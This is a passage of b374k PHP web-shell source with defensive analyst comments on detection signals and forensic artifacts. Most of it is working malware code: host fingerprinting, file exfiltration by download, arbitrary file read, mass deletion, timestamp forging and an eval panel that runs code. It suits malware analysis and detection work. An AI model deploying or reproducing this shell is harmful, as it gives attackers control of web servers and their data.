  // not already provide it, which is one of several signs in this file that it targets
  // very old PHP installs as well as current ones.
  // Returns $s_t cut into consecutive pieces of $s_s bytes (substr is byte-wise); the last
  // piece may be shorter. There is no guard on $s_s: a value of 0 never advances $s_i.
  852. if(!function_exists('str_split')){
  853. function str_split($s_t,$s_s=1){
  854. $s_a = array();
  855. for($s_i=0;$s_i<strlen($s_t);){
  856. $s_a[] = substr($s_t,$s_i,$s_s);
  857. $s_i += $s_s;
  858. }
  859. return $s_a;
  860. }
  861. }
  862.  
  863. // appearance
  // Analyst note: UI theme selection, run before the authentication gate further down.
  // State is kept client-side in a cookie named "theme"; a request with x=switch flips it
  // between "dark" and "bright" and re-issues the cookie with lifetime $s_login_time
  // (set to 3600 * 24 * 7 seconds at the top of the file).
  // The cookie value is taken as-is: anything other than "bright" selects the dark palette.
  // HEAD shows the logout handler keeps the "theme" and "cwd" cookies, so they can remain in
  // a browser profile after the operator logs out.
  864. $s_theme = "dark";
  865. if(isset($_COOKIE['theme'])) $s_theme = $_COOKIE['theme'];
  866. if(isset($_REQUEST['x']) && ($_REQUEST['x']=='switch')){
  867. if(isset($_COOKIE['theme'])){
  868. $s_theme = $_COOKIE['theme'];
  869. }
  870. if($s_theme=="bright") $s_theme = "dark";
  871. else $s_theme = "bright";
  872. setcookie("theme", $s_theme ,time() + $s_login_time);
  873. }
  874.  
  875.  
  876.  
  // Colour tables: 13 CSS colours per theme and 5 hex values per theme for highlighting.
  877. $s_dark = array("#000000","#FFFFFF","#222222","#4C9CAF","#111111","#AAAAAA","#292929","#363636","#191919","#444444","#CCCCCC","#999999","#202020");
  878. $s_bright = array("#FFFFFF","#000000","#DDDDDD","#B36350","#EEEEEE","#555555","#D6D6D6","#C9C9C9","#E6E6E6","#BBBBBB","#333333","#666666","#DFDFDF");
  879. $s_highlight_dark = array("4C9CAF","888888", "87DF45", "EEEEEE" , "FF8000");
  880. $s_highlight_bright = array("B36350","777777", "7820BA", "111111" , "007FFF");
  881. $s_color = ($s_theme=="bright")? $s_bright:$s_dark;
  // $s_bright_cb / $s_dark_cb are not assigned anywhere in this excerpt -- presumably
  // defined earlier in the file; verify.
  882. $s_checkbox = ($s_theme=="bright")? $s_bright_cb:$s_dark_cb;
  883.  
  884.  
  885.  
  // Analyst note: works out the base URL ($s_self) that every link and form of the shell
  // is prefixed with, and detects whether the shell runs as its own file or was pulled in
  // by another script.
  // $s_cek1 is the basename of the script the web server was asked for; $s_cek2 is the
  // basename of this file, cut to the same length. If they differ, this file is executing
  // from inside a different entry script (e.g. via include), and the original query string
  // is preserved as the link prefix so later clicks still reach the shell through the host
  // script.
  // State is again client-side. Cookie names set here: "b374k_included" ("1"/"0"),
  // "s_self", "s_home". Together with the "b374k" auth cookie in HEAD these are stable
  // strings to search for wherever request cookies or Set-Cookie headers are captured
  // (WAF, proxy or full-packet logs).
  // $s_self is read back from a cookie without validation and, in the listing code above,
  // concatenated into href/action attributes unescaped.
  886. global $s_self;
  887. $s_self = "?";
  888.  
  889. $s_cek1 = basename($_SERVER['SCRIPT_FILENAME']);
  890. $s_cek2 = substr(basename(__FILE__),0,strlen($s_cek1));;
  891.  
  892. if(isset($_COOKIE['b374k_included'])){
  // Cookie says "included" was seen before: trust s_self from the cookie while the names
  // still differ, otherwise reset to standalone mode and expire the marker cookie.
  893. if(strcmp($s_cek1,$s_cek2)!=0) $s_self = $_COOKIE['s_self'];
  894. else{
  895. $s_self = "?";
  896. setcookie("b374k_included", "0" ,time() - $s_login_time);
  897. setcookie("s_self", $s_self ,time() + $s_login_time);
  898. }
  899. }
  900. else{
  901. if(strcmp($s_cek1,$s_cek2)!=0){
  // First request in included mode: remember the host script's query string in s_home.
  902. if(!isset($_COOKIE['s_home'])){
  903. $s_home = "?".$_SERVER["QUERY_STRING"]."&";
  904. setcookie("s_home", $s_home ,time() + $s_login_time);
  905. }
  906. if(isset($s_home)) $s_self = $s_home;
  907. elseif(isset($_COOKIE['s_home'])) $s_self = $_COOKIE['s_home'];
  908. setcookie("b374k_included", "1" ,time() + $s_login_time);
  909. setcookie("s_self", $s_self ,time() + $s_login_time);
  910. }
  911. else{
  912. $s_self = "?";
  913. setcookie("b374k_included", "0" ,time() - $s_login_time);
  914. setcookie("s_self", $s_self ,time() + $s_login_time);
  915. }
  916. }
  917.  
  918. if($s_auth){
  919. // server software
  // Analyst note: host fingerprinting performed on every authenticated request (this run
  // sits inside the if($s_auth) block opened on the line above). It collects the server
  // banner, the full uname string, the OS family, the working directory, the account the
  // PHP worker runs as, the server address and the client address.
  920. $s_software = getenv("SERVER_SOFTWARE");
  921. // uname -a
  922. $s_system = php_uname();
  923. // check os
  924. $s_win = (strtolower(substr($s_system,0,3)) == "win")? true : false;
  925. // change working directory
  // The working directory is operator-controlled: taken from the "cd" request parameter
  // or, failing that, from the "cwd" cookie. ss() and cp() are defined outside this
  // excerpt (presumably un-escaping and path clean-up -- verify). No base-directory
  // restriction is applied here; only is_dir() is checked.
  926. if(isset($_REQUEST['cd'])){
  927. $s_dd = ss($_REQUEST['cd']);
  928. if(is_dir($s_dd)){
  929. $s_cwd = cp($s_dd);
  930. chdir($s_cwd);
  931. setcookie("cwd", $s_cwd ,time() + $s_login_time);
  932. }
  933. }
  934. else{
  935. if(isset($_COOKIE['cwd'])){
  936. $s_dd = ss($_COOKIE['cwd']);
  937. if(is_dir($s_dd)){
  938. $s_cwd = cp($s_dd);
  939. chdir($s_cwd);
  940. }
  941. }
  942. else $s_cwd = cp(getcwd());
  943. }
  944.  
  // On non-Windows hosts "whoami" and "id" are passed to exe() on each authenticated page
  // load. exe() is defined outside this excerpt; HEAD shows it being given a decoded
  // request parameter and its return value echoed, so it presumably runs OS commands.
  // If so, whoami/id child processes of the web server or PHP-FPM account are a
  // high-signal detection point in process telemetry (auditd, EDR).
  945. if(!$s_win){
  946. if(!$s_user = rp(exe("whoami"))) $s_user = "";
  947. if(!$s_id = rp(exe("id"))) $s_id = "";
  948. }
  949. else {
  950. $s_user = get_current_user();
  951. $s_id = $s_user;
  952. }
  953.  
  954. // prompt style..
  955. $s_prompt = $s_user." &gt;";
  956. // check for posix
  957. $s_posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
  958. // server ip
  // Resolves whatever the client sent in the Host header, i.e. a client-influenced DNS lookup.
  959. $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
  960. // your ip ;-)
  961. $s_my_ip = $_SERVER['REMOTE_ADDR'];
  962. $s_result = "";
  963.  
  // Analyst note: capability probing for seven external tools (python, perl, ruby, node,
  // gcc, java, tar). Each follows the same pattern: if a cookie named s_<tool> exists its
  // value is trusted; otherwise check_access("<tool>") is called and the answer is cached
  // in that cookie for $s_login_time. Only the string "1" counts as available.
  // check_access() is defined outside this excerpt; presumably it tests whether the binary
  // can be run -- verify. If it spawns processes, the first authenticated request from a
  // fresh browser produces a burst of interpreter/compiler lookups under the web server
  // account, and later requests do not, because the result comes back from the cookies.
  // Cookie names set here: s_python, s_perl, s_ruby, s_node, s_gcc, s_java, s_tar.
  // $s_tar gates the tar options of the file-listing footer earlier in this file.
  964. global $s_python, $s_perl, $s_ruby, $s_node, $s_gcc, $s_java, $s_tar;
  965. // check python
  966. if(isset($_COOKIE['s_python'])){$s_python = $_COOKIE['s_python'];}
  967. else{
  968. $s_python = check_access("python");
  969. setcookie("s_python", $s_python ,time() + $s_login_time);
  970. }
  971. $s_python = ($s_python=="1")?true:false;
  972.  
  973. // check perl
  974. if(isset($_COOKIE['s_perl'])){$s_perl = $_COOKIE['s_perl'];}
  975. else{
  976. $s_perl = check_access("perl");
  977. setcookie("s_perl", $s_perl ,time() + $s_login_time);
  978. }
  979. $s_perl = ($s_perl=="1")?true:false;
  980.  
  981. // check ruby
  982. if(isset($_COOKIE['s_ruby'])){$s_ruby = $_COOKIE['s_ruby'];}
  983. else{
  984. $s_ruby = check_access("ruby");
  985. setcookie("s_ruby", $s_ruby ,time() + $s_login_time);
  986. }
  987. $s_ruby = ($s_ruby=="1")?true:false;
  988.  
  989. // check nodejs
  990. if(isset($_COOKIE['s_node'])){$s_node = $_COOKIE['s_node'];}
  991. else{
  992. $s_node = check_access("node");
  993. setcookie("s_node", $s_node ,time() + $s_login_time);
  994. }
  995. $s_node = ($s_node=="1")?true:false;
  996.  
  997. // check gcc
  998. if(isset($_COOKIE['s_gcc'])){$s_gcc = $_COOKIE['s_gcc'];}
  999. else{
  1000. $s_gcc = check_access("gcc");
  1001. setcookie("s_gcc", $s_gcc ,time() + $s_login_time);
  1002. }
  1003. $s_gcc = ($s_gcc=="1")?true:false;
  1004.  
  1005. // check java
  1006. if(isset($_COOKIE['s_java'])){$s_java = $_COOKIE['s_java'];}
  1007. else{
  1008. $s_java = check_access("java");
  1009. setcookie("s_java", $s_java ,time() + $s_login_time);
  1010. }
  1011. $s_java = ($s_java=="1")?true:false;
  1012.  
  1013. // check tar
  1014. if(isset($_COOKIE['s_tar'])){$s_tar = $_COOKIE['s_tar'];}
  1015. else{
  1016. $s_tar = check_access("tar");
  1017. setcookie("s_tar", $s_tar ,time() + $s_login_time);
  1018. }
  1019. $s_tar = ($s_tar=="1")?true:false;
  1020.  
  // Analyst note: file/directory download handler -- the data-exfiltration path of the
  // shell. Triggered when both "dltype" and "dlpath" are present in the request.
  // dltype values handled: "ziparchive", "tar", "targz" (archive first, then send) and
  // "raw" (send the file as it is). zip(), exe(), ss() and get_writabledir() are defined
  // outside this excerpt.
  // Forensic artifacts:
  //  - archives are written to the directory returned by get_writabledir() and named after
  //    the downloaded path with .zip / .tar / .tar.gz appended;
  //  - the clean-up at the end of the block is commented out, so those archives are left
  //    on disk after the transfer;
  //  - the response is sent as application/octet-stream with a Content-disposition
  //    attachment header, which is unusual for a PHP page and visible to proxies that
  //    record response headers.
  1021. if(!empty($_REQUEST['dltype']) && !empty($_REQUEST['dlpath'])){
  1022. $s_dltype = ss($_REQUEST['dltype']);
  1023. $s_dlpath = ss($_REQUEST['dlpath']);
  1024.  
  // Archive name: basename of the requested path; "." and ".." are resolved to the name
  // of the current / parent directory.
  1025. $s_dlname = basename($s_dlpath);
  1026. if($s_dlpath==".") $s_dlname=basename($s_cwd);
  1027. elseif($s_dlpath==".."){
  1028. chdir("..");
  1029. $s_dlname=basename(getcwd());
  1030. chdir($s_cwd);
  1031. }
  1032. $s_tmpdir = get_writabledir();
  1033. $s_dlarchive = $s_tmpdir.$s_dlname;
  1034. $s_dlthis = "";
  1035. if($s_dltype=="ziparchive"){
  1036. $s_dlarchive .= ".zip";
  1037. if(zip($s_dlpath,$s_dlarchive)){
  1038. $s_dlthis = $s_dlarchive;
  1039. }
  1040. }
  1041. elseif($s_dltype=="tar"){
  // The tar command line is built by string concatenation from request-derived values;
  // both paths are appended without quoting.
  1042. $s_dlarchive .= ".tar";
  1043. $s_dlarchive = str_replace('\\', '/', $s_dlarchive);
  1044. exe("tar cf ".$s_dlarchive." ".$s_dlpath);
  1045. $s_dlthis = $s_dlarchive;
  1046. }
  1047. elseif($s_dltype=="targz"){
  1048. $s_dlarchive .= ".tar.gz";
  1049. $s_dlarchive = str_replace('\\', '/', $s_dlarchive);
  1050. exe("tar czf ".$s_dlarchive." ".$s_dlpath);
  1051. $s_dlthis = $s_dlarchive;
  1052. }
  1053. elseif($s_dltype=="raw"){
  1054. if(is_file($s_dlpath)) $s_dlthis = $s_dlpath;
  1055. }
  1056.  
  // Stream the chosen file in 8 KiB reads, flushing after each, then end the request.
  1057. if(is_file($s_dlthis)){
  1058. header("Content-Type: application/octet-stream");
  1059. header('Content-Transfer-Encoding: binary');
  1060. header("Content-length: ".@filesize($s_dlthis));
  1061. header("Content-disposition: attachment; filename=\"".basename($s_dlthis)."\";");
  1062. $s_file = @fopen($s_dlthis,"rb");
  1063. while(!feof($s_file)){
  1064. print(@fread($s_file, 1024*8));
  1065. ob_flush();
  1066. flush();
  1067. }
  1068. fclose($s_file);
  1069.  
  // Temporary-archive removal is disabled (both statements are commented out).
  1070. if($s_dltype!="raw"){
  1071. //rename($s_dlthis,$s_dlthis."del");
  1072. //unlink($s_dlthis."del");
  1073. }
  1074. exit;
  1075. }
  1076. }
  1077. // massact
  1078. if(isset($_REQUEST['y'])){
  1079. $s_massact = $_COOKIE['massact'];
  1080. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1081. $s_lists = explode("|", $s_buffer);
  1082. if(!empty($s_buffer)){
  1083. if($_REQUEST['y']=='delete'){
  1084. $s_result .= "<p class='notif'>Delete ? <a href='".$s_self."y=delok' onclick='return false;'>Yes</a> | <a href='".$s_self."' onclick='return false;'>No</a></p>";
  1085. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1086. }
  1087. elseif($_REQUEST['y']=='chmod'){
  1088. $s_result .= "<div class='notif'>chmod ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='0755' name='chmodok' style='width:30px;text-align:center;' maxlength='4' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
  1089. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1090. }
  1091. elseif($_REQUEST['y']=='touch'){
  1092. $s_result .= "<div class='notif'>touch ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".date("d-M-Y H:i:s",time())."' name='touchok' style='width:130px;text-align:center;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
  1093. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1094. }
  1095. elseif($_REQUEST['y']=='extractzip'){
  1096. $s_result .= "<div class='notif'>extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd."' name='extractzipok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
  1097. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1098. }
  1099. elseif($_REQUEST['y']=='extracttar'){
  1100. $s_result .= "<div class='notif'>extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd."' name='extracttarok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
  1101. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1102. }
  1103. elseif($_REQUEST['y']=='extracttargz'){
  1104. $s_result .= "<div class='notif'>extract to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd."' name='extracttargzok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
  1105. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1106. }
  1107. elseif($_REQUEST['y']=='compresszip'){
  1108. $s_result .= "<div class='notif'>compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd.substr(md5(time()),0,8).".zip' name='compresszipok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
  1109. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1110. }
  1111. elseif($_REQUEST['y']=='compresstar'){
  1112. $s_result .= "<div class='notif'>compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd.substr(md5(time()),0,8).".tar' name='compresstarok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
  1113. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1114. }
  1115. elseif($_REQUEST['y']=='compresstargz'){
  1116. $s_result .= "<div class='notif'>compress to ? <form action='".$s_self."' method='post'><input class='inputz' type='text' value='".$s_cwd.substr(md5(time()),0,8).".tar.gz' name='compresstargzok' style='width:50%;' /><input class='inputzbut' type='submit' value='Go !' /></form></div>";
  1117. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1118. }
  1119. elseif($_REQUEST['y']=='paste' && $s_massact=='cut'){
  1120. $s_result .= "<p class='notif'>Move here ? <a href='".$s_self."y=moveok' onclick='return false;'>Yes</a> | <a href='".$s_self."' onclick='return false;'>No</a></p>";
  1121. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1122. }
  1123. elseif($_REQUEST['y']=='paste' && $s_massact=='copy'){
  1124. $s_result .= "<p class='notif'>Copy here ? <a href='".$s_self."y=copyok' onclick='return false;'>Yes</a> | <a href='".$s_self."' onclick='return false;'>No</a></p>";
  1125. foreach($s_lists as $s_l) $s_result .= "<p class='notif'>".$s_l."</p>";
  1126. }
  1127. }
  1128. }
  1129.  
  1130. if(isset($_REQUEST['y'])){
  1131. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1132. $s_lists = explode("|", $s_buffer);
  1133. $s_counter = 0;
  1134. if($_REQUEST['y']=='moveok'){
  1135. foreach($s_lists as $s_l){
  1136. if(rename($s_l,$s_cwd.basename($s_l))) $s_counter++;
  1137. }
  1138. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders moved</p>";
  1139. else $s_result .= "<p class='notif'>no files/folders moved</p>";
  1140. setcookie("buffer", "" ,time() - $s_login_time);
  1141. setcookie("massact", "" ,time() - $s_login_time);
  1142. }
  1143. if($_REQUEST['y']=='copyok'){
  1144. foreach($s_lists as $s_l){
  1145. if(copy($s_l,$s_cwd.basename($s_l))) $s_counter++;
  1146. }
  1147. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders copied</p>";
  1148. else $s_result .= "<p class='notif'>no files/folders copied</p>";
  1149. setcookie("buffer", "" ,time() - $s_login_time);
  1150. setcookie("massact", "" ,time() - $s_login_time);
  1151. }
  1152. if($_REQUEST['y']=='delok'){
  1153. foreach($s_lists as $s_l){
  1154. if(is_file($s_l)){
  1155. if(unlink($s_l)) $s_counter++;
  1156. }
  1157. elseif(is_dir($s_l)){
  1158. rmdirs($s_l);
  1159. if(!is_dir($s_l)) $s_counter++;
  1160. }
  1161. }
  1162. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders deleted</p>";
  1163. else $s_result .= "<p class='notif'>no files/folders deleted</p>";
  1164. setcookie("buffer", "" ,time() - $s_login_time);
  1165. setcookie("massact", "" ,time() - $s_login_time);
  1166. }
  1167. }
  1168. elseif(isset($_REQUEST['chmodok'])){
  1169. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1170. $s_lists = explode("|", $s_buffer);
  1171. $s_counter = 0;
  1172. $s_mod = octdec($_REQUEST['chmodok']);
  1173. foreach($s_lists as $s_l){
  1174. if(chmod($s_l,$s_mod)) $s_counter++;
  1175. }
  1176. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders changed mode to ".decoct($s_mod)."</p>";
  1177. else $s_result .= "<p class='notif'>no files/folders modified</p>";
  1178. setcookie("buffer", "" ,time() - $s_login_time);
  1179. setcookie("massact", "" ,time() - $s_login_time);
  1180. }
  1181. elseif(isset($_REQUEST['touchok'])){
  1182. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1183. $s_lists = explode("|", $s_buffer);
  1184. $s_counter = 0;
  1185. $s_datenew = strtotime($_REQUEST['touchok']);
  1186. foreach($s_lists as $s_l){
  1187. if(touch($s_l,$s_datenew)) $s_counter++;
  1188. }
  1189. if($s_counter>0) $s_result .= "<p class='notif'>".$s_counter." files/folders changed access and modification time to ".date("d-M-Y H:i:s",$s_datenew)."</p>";
  1190. else $s_result .= "<p class='notif'>no files/folders modified</p>";
  1191. setcookie("buffer", "" ,time() - $s_login_time);
  1192. setcookie("massact", "" ,time() - $s_login_time);
  1193. }
  1194. elseif(isset($_REQUEST['compresszipok'])){
  1195. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1196. $s_lists = explode("|", $s_buffer);
  1197. $s_file = $_REQUEST['compresszipok'];
  1198. if(zip($s_lists, $s_file)){
  1199. $s_result .= "<p class='notif'>archive created : ".$s_file."</p>";
  1200. }
  1201. else $s_result .= "<p class='notif'>error creating archive file</p>";
  1202. setcookie("buffer", "" ,time() - $s_login_time);
  1203. setcookie("massact", "" ,time() - $s_login_time);
  1204. }
  1205. elseif(isset($_REQUEST['compresstarok'])){
  1206. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1207. $s_lists_ = explode("|", $s_buffer);
  1208. $s_lists = array();
  1209. $s_file = $_REQUEST['compresstarok'];
  1210. $s_file = basename($s_file);
  1211.  
  1212. $s_lists__ = array_map("basename", $s_lists_);
  1213. $s_lists = array_map("pf", $s_lists__);
  1214. exe("tar cf \"".$s_file."\" ".implode(" ", $s_lists));
  1215.  
  1216. if(is_file($s_file)){
  1217. $s_result .= "<p class='notif'>archive created : ".$s_file."</p>";
  1218. }
  1219. else $s_result .= "<p class='notif'>error creating archive file</p>";
  1220. setcookie("buffer", "" ,time() - $s_login_time);
  1221. setcookie("massact", "" ,time() - $s_login_time);
  1222. }
  1223. elseif(isset($_REQUEST['compresstargzok'])){
  1224. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1225. $s_lists_ = explode("|", $s_buffer);
  1226. $s_lists = array();
  1227. $s_file = $_REQUEST['compresstargzok'];
  1228. $s_file = basename($s_file);
  1229.  
  1230. $s_lists__ = array_map("basename", $s_lists_);
  1231. $s_lists = array_map("pf", $s_lists__);
  1232. exe("tar czf \"".$s_file."\" ".implode(" ", $s_lists));
  1233.  
  1234. if(is_file($s_file)){
  1235. $s_result .= "<p class='notif'>archive created : ".$s_file."</p>";
  1236. }
  1237. else $s_result .= "<p class='notif'>error creating archive file</p>";
  1238. setcookie("buffer", "" ,time() - $s_login_time);
  1239. setcookie("massact", "" ,time() - $s_login_time);
  1240. }
  1241. elseif(isset($_REQUEST['extractzipok'])){
  1242. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1243. $s_lists = explode("|", $s_buffer);
  1244. $s_file = $_REQUEST['extractzipok'];
  1245.  
  1246. $zip = new ZipArchive();
  1247. foreach($s_lists as $f){
  1248. $s_target = $s_file.basename($f,".zip");
  1249. if($zip->open($f)){
  1250. if(!is_dir($s_target)) mkdir($s_target);
  1251. if($zip->extractTo($s_target)){
  1252. $s_result .= "<p class='notif'>files extracted to ".$s_target."</p>";
  1253. }
  1254. else $s_result .= "<p class='notif'>error extrating archive file</p>";
  1255. $zip->close();
  1256. }
  1257. else $s_result .= "<p class='notif'>error opening archive file</p>";
  1258. }
  1259. setcookie("buffer", "" ,time() - $s_login_time);
  1260. setcookie("massact", "" ,time() - $s_login_time);
  1261. }
  1262. elseif(isset($_REQUEST['extracttarok'])){
  1263. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1264. $s_lists = explode("|", $s_buffer);
  1265. $s_file = $_REQUEST['extracttarok'];
  1266.  
  1267. foreach($s_lists as $f){
  1268. $s_target = "";
  1269. $s_target = basename($f,".tar");
  1270. if(!is_dir($s_target)) mkdir($s_target);
  1271. exe("tar xf \"".basename($f)."\" -C \"".$s_target."\"");
  1272. }
  1273. setcookie("buffer", "" ,time() - $s_login_time);
  1274. setcookie("massact", "" ,time() - $s_login_time);
  1275. }
  1276. elseif(isset($_REQUEST['extracttargzok'])){
  1277. $s_buffer = rtrim(trim(urldecode($_COOKIE['buffer'])),"|");
  1278. $s_lists = explode("|", $s_buffer);
  1279. $s_file = $_REQUEST['extracttargzok'];
  1280.  
  1281. foreach($s_lists as $f){
  1282. $s_target = "";
  1283. if(strpos(strtolower($f), ".tar.gz")!==false) $s_target = basename($f,".tar.gz");
  1284. elseif(strpos(strtolower($f), ".tgz")!==false) $s_target = basename($f,".tgz");
  1285. if(!is_dir($s_target)) mkdir($s_target);
  1286. exe("tar xzf \"".basename($f)."\" -C \"".$s_target."\"");
  1287. }
  1288. setcookie("buffer", "" ,time() - $s_login_time);
  1289. setcookie("massact", "" ,time() - $s_login_time);
  1290. }
  1291.  
  1292. // view image specified by ?img=<file>
  // Analyst note: despite the name this is a general file-read endpoint. The path is the
  // concatenation of request parameters "d" and "img" (after ss(), defined outside this
  // excerpt); the result of getimagesize() is used only for the Content-type header and is
  // never checked, so a path that is not an image is still passed to readfile() and
  // returned in the response body.
  // The response carries long-lived caching headers (public, max-age of 7 days, Expires in
  // 2030), so content fetched through this handler can persist in browser or proxy caches.
  1293. if(isset($_REQUEST['img'])){
  1294. ob_clean();
  1295. $s_d = ss($_REQUEST['d']);
  1296. $s_f = ss($_REQUEST['img']);
  1297. $s_inf = @getimagesize($s_d.$s_f);
  // $s_ext is computed here but not read again within this block.
  1298. $s_ext = explode($s_f,".");
  1299. $s_ext = $s_ext[count($s_ext)-1];
  1300. header("Content-type: ".$s_inf["mime"]);
  1301. header("Cache-control: public");
  1302. header("Expires: ".@date("r",@mktime(0,0,0,1,1,2030)));
  1303. header("Cache-control: max-age=".(60*60*24*7));#
  1304. readfile($s_d.$s_f);
  1305. exit;
  1306. }
  1307.  
  1308. // rename file or folder
  // Analyst note: rename/move primitive. Requires the request parameters "rename",
  // "oldname" and "newname" (the form that submits them is generated per file in the
  // listing code earlier in this file). Both names go through ss() (defined outside this
  // excerpt) and are then passed to rename() with no restriction on the target location,
  // so this also serves to move or re-extension files anywhere the PHP account can write.
  // Unexpected renames inside the web root, especially ones that give a file an executable
  // extension, are the file-integrity signal for this handler.
  1309. if(isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])){
  1310. $s_old = ss($_REQUEST['oldname']);
  1311. $s_new = ss($_REQUEST['newname']);
  1312.  
  1313. $s_renmsg = "";
  // '@' hides rename() warnings; the outcome is reported only in the page itself.
  1314. if(is_dir($s_old)) $s_renmsg = (@rename($s_old,$s_new)) ? "Directory ".$s_old." renamed to ".$s_new : "Unable to rename directory ".$s_old." to ".$s_new;
  1315. elseif(is_file($s_old)) $s_renmsg = (@rename($s_old,$s_new)) ? "File ".$s_old." renamed to ".$s_new : "Unable to rename file ".$s_old." to ".$s_new;
  1316. else $s_renmsg = "Cannot find the path specified ".$s_old;
  1317.  
  // The names are written into the result HTML without escaping.
  1318. $s_result .= "<p class='notif'>".$s_renmsg."</p>";
  1319. $s_fnew = $s_new;
  1320. }
  1321.  
  1322. // confirm delete
  // Analyst note: one if/elseif chain with three mutually exclusive actions, chosen by
  // which request parameter is non-empty: "del" (show a confirmation link), "delete"
  // (remove a file or a whole directory tree) and "mkdir" (create a directory under the
  // current working directory).
  // For incident response: deletions made here are done by PHP itself (unlink(), and
  // rmdirs(), which is defined outside this excerpt and presumably recursive), so they
  // appear in file-system auditing under the web server account but not as rm processes.
  1323. if(!empty($_REQUEST['del'])){
  // The "del" value is echoed into the confirmation link without escaping.
  1324. $s_del = trim($_REQUEST['del']);
  1325. $s_result .= "<p class='notif'>Delete ".basename($s_del)." ? <a href='".$s_self."delete=".$s_del."' onclick='return false;'>Yes</a> | <a href='".$s_self."' onclick='return false;'>No</a></p>";
  1326. }// delete file
  1327. elseif(!empty($_REQUEST['delete'])){
  1328. $s_f = ss($_REQUEST['delete']);
  1329. $s_delmsg = "";
  1330. if(is_file($s_f)){
  1331. $s_delmsg = (unlink($s_f)) ? "File removed : ".$s_f : "Unable to remove file ".$s_f;
  1332. }
  1333. elseif(is_dir($s_f)){
  // Success is judged by whether the directory still exists after rmdirs().
  1334. rmdirs($s_f);
  1335. $s_delmsg = (is_dir($s_f)) ? "Unable to remove directory ".$s_f : "Directory removed : ".$s_f;
  1336. }
  1337. else $s_delmsg = "Cannot find the path specified ".$s_f;
  1338. $s_result .= "<p class='notif'>".$s_delmsg."</p>";
  1339. } // create dir
  1340. elseif(!empty($_REQUEST['mkdir'])){
  1341. $s_f = ss($s_cwd.ss($_REQUEST['mkdir']));
  1342. $s_dirmsg = "";
  1343.  
  // Name-collision handling: when the directory already exists, a numeric suffix after
  // the last "_" is incremented until an unused name is found.
  1344. $s_num = 1;
  1345. if(is_dir($s_f)){
  1346. $s_pos = strrpos($s_f,"_");
  1347. if($s_pos!==false) $s_num = (int) substr($s_f,$s_pos+1);
  1348. while(is_dir(substr($s_f,0,$s_pos)."_".$s_num)){
  1349. $s_num++;
  1350. }
  1351. $s_f = substr($s_f,0,$s_pos)."_".$s_num;
  1352. }
  1353. if(mkdir($s_f)) $s_dirmsg = "Directory created ".$s_f;
  1354. else $s_dirmsg = "Unable to create directory ".$s_f;
  1355.  
  1356. $s_result .= "<p class='notif'>".$s_dirmsg."</p>";
  1357. }
  1358.  
  1359. // php eval() function
        // Analyst notes: code-execution panel, reached with x=eval. The source text (evalcode),
        // the language (lang) and extra command-line options (gccoption) are request values.
        //   php                   -> passed to eval() inside an output buffer
        //   python/perl/ruby/node -> written to a file named md5(time().rand(0,100)) in the
        //                            directory returned by get_writabledir(), run, then deleted
        //   gcc                   -> written as <md5>.c, compiled, executed, binary and source deleted
        //   java                  -> written as <class>.java, compiled with javac, run with java, deleted
        // ssc(), exe(), hss() and get_writabledir() are defined outside this excerpt; exe() is
        // presumably the command-execution wrapper (confirm against its definition).
        // Detection: interpreters or compilers (python, perl, ruby, node, gcc, javac, java,
        // "chmod +x") spawned as children of the web server / PHP worker; short-lived files with
        // 32-hex-character names, or b374k_<8 hex>.java/.class, in writable directories.
        // Hardening: eval() is a language construct, so the disable_functions ini directive does
        // not cover the php path; keeping compilers off web hosts and mounting writable
        // directories noexec limits the compiled-language paths.
  1360. if(isset($_REQUEST['x']) && ($_REQUEST['x']=='eval')){
  1361. $s_code = "";
  1362. $s_res = "";
  1363. $s_gccoption = "";
  1364. $s_lang = "php";
  1365.  
  1366. if(isset($_REQUEST['evalcode'])){
  1367. $s_code = ssc($_REQUEST['evalcode']);
